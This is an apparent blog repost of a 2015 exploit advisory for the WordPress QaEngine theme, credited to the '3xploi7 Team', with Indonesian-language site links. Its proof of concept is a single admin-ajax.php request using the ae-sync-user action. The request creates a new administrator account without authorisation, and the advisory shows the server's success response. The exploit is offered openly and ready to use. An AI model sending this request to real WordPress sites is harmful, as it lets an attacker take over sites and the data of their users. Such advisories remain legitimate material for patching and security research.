WordPress QaEngine Theme - Add Administrator




#- Title: WordPress QaEngine Theme - Add Administrator
#- Author: A. Samman
#- URL : research.evex.pw/?vuln=10
#- Date: 04/06/2015
#- Vendor: enginethemes.com
#- Download Link: enginethemes.com/themes/qaengine/
#- References :
#- OSVDB : 121267 
#- PACKETSTORM : 131648
#- WPVDB ID : 7885
#- Description : QAEngine vulnerability allows an attacker to have an administrator account on the target's website.

--------------------------------------------------------------------------------------
Proof of Concept :

http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator

Response : {"success":true,"data":{"action":"ae-sync-user","user_login":"xADMIN","user_pass":"xPASS","role":"administrator","ID":5},"msg":"Update
user successful!"}



3xploi7 Team

0 Response to "WordPress QaEngine Theme - Add Administrator"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel


Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya

Simak Update Artikel menarik disini, Stay toon !! 3xploi7.com
Jangan sampai Terlewatkan.
 • Join Grup Team : 
— Facebook Grup ( 1.973 Anggota )
 Line Square 


 • Update Konten Unik Lainnya di : 
 Instagram
— Twitter

 • Tonton video kami di : 

 Youtube